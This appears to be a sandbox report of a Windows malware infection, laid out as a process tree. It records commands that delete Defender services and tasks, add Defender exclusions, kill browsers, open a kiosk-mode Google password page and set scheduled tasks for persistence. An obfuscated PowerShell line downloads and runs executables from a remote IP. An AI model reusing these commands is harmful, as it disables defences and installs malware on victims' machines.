C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:2000
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:5964
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:2816
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:5996
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:4092
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:4932
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:6040
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:6024
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:4864
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:3076
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5772
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:2892
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:996
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:4748
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:5980
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:4744
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3156
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:5260
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5828 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408210101\5e593f5981.exe"C:\Users\Admin\AppData\Local\Temp\10408210101\5e593f5981.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10408210101\5e593f5981.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5932
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408250101\a86f684b95.exe"C:\Users\Admin\AppData\Local\Temp\10408250101\a86f684b95.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10408250101\a86f684b95.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:4932
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408330101\55ba869587.exe"C:\Users\Admin\AppData\Local\Temp\10408330101\55ba869587.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5232
-
-
C:\Users\Admin\AppData\Local\Temp\10408340101\b123c29fff.exe"C:\Users\Admin\AppData\Local\Temp\10408340101\b123c29fff.exe"6⤵
- Executes dropped EXE
PID:4276
-
-
C:\Users\Admin\AppData\Local\Temp\10408350101\96b3ec11f4.exe"C:\Users\Admin\AppData\Local\Temp\10408350101\96b3ec11f4.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5680 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1720
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5396
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:4472
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5208 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2024 -prefsLen 27099 -prefMapHandle 2028 -prefMapSize 270279 -ipcHandle 2104 -initialChannelId {7216a9b9-02ad-4cd5-a0e8-c0b2e17ad8ef} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:2940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2492 -prefsLen 27135 -prefMapHandle 2496 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {4dc9e004-160c-400f-a7e9-dbbcecb13a06} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3864 -prefsLen 25164 -prefMapHandle 3868 -prefMapSize 270279 -jsInitHandle 3872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3880 -initialChannelId {481b4f5e-6b5f-47cc-ad1a-23bf4cf257af} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:1788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4028 -prefsLen 27276 -prefMapHandle 4032 -prefMapSize 270279 -ipcHandle 4116 -initialChannelId {ec17edf2-1a84-4d0e-9879-c0555a7cf8a5} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:3520
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2912 -prefsLen 34775 -prefMapHandle 2832 -prefMapSize 270279 -jsInitHandle 2836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3160 -initialChannelId {80d2d26f-d7e0-48db-a6e5-5caac5dcdc5a} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:1568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4704 -prefsLen 35012 -prefMapHandle 3216 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {5cb87c47-e028-47b8-9862-dc26f8448f65} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:6548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5280 -prefsLen 32900 -prefMapHandle 5284 -prefMapSize 270279 -jsInitHandle 5288 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5296 -initialChannelId {d1c1c5aa-c8e7-495a-9335-33427e1c411a} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:6576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5524 -prefsLen 32952 -prefMapHandle 5520 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5540 -initialChannelId {820b8cfc-2e08-4707-882c-b3056f86a29a} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:6624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5488 -prefsLen 32952 -prefMapHandle 5484 -prefMapSize 270279 -jsInitHandle 5480 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5468 -initialChannelId {394250b6-5c39-4022-b04b-ced585a77c8c} -parentPid 5208 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5208" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:6696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408360101\8bc5209835.exe"C:\Users\Admin\AppData\Local\Temp\10408360101\8bc5209835.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\10408370101\c95b3da7df.exe"C:\Users\Admin\AppData\Local\Temp\10408370101\c95b3da7df.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7980 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:6684
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408380101\8480483e2e.exe"C:\Users\Admin\AppData\Local\Temp\10408380101\8480483e2e.exe"6⤵
- Executes dropped EXE
PID:1976
-
-
C:\Users\Admin\AppData\Local\Temp\10408390101\5338edf835.exe"C:\Users\Admin\AppData\Local\Temp\10408390101\5338edf835.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7932
-
-
C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe"C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe"6⤵
- Executes dropped EXE
PID:4616 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:7020
-
-
C:\ProgramData\Google\Chrome\chrome.exe"C:\ProgramData\Google\Chrome\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4768 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:5892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
PID:6464
-
-
C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:7532 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵PID:4208
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:8184
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:4676
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:1972
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:6468
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵PID:6524
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵PID:6340
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:5436
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:2388
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5756
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵PID:688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:8072 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:2764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:5520
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:3508 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:7400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵PID:8092
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:7440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408440101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10408440101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:7236
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:7508
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408450101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10408450101\XOPPRUc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:12200 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:12228
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408460101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10408460101\qWR3lUj.exe"6⤵PID:7556
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:6080
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408470101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10408470101\h8NlU62.exe"6⤵PID:7512
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:7292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3076
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3896
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:244 -
C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2328 -
C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2316 -
C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe4⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))5⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1592 -
C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4376 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe4⤵PID:4988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3760 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1544 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- System Location Discovery: System Language Discovery
PID:6660
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 680 -ip 6801⤵PID:5264
-
C:\ProgramData\TECLA\Updater.exeC:\ProgramData\TECLA\Updater.exe /u1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:3620 -
C:\Windows\TEMP\datCB2B.tmp\datCB3B.exeC:\Windows\TEMP\datCB2B.tmp\datCB3B.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2176 -
C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe"C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:7384 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Windows\system32\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:7464 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))6⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
PID:3452
-
-
-
-
-
C:\Windows\TEMP\dat1D15.tmp\dat1D16.exeC:\Windows\TEMP\dat1D15.tmp\dat1D16.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3044 -
C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe"C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:5776 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exeC:\Windows\system32\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5704 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exeC:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe5⤵PID:4448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 4926⤵
- Program crash
PID:8000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵PID:4632
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5196
-
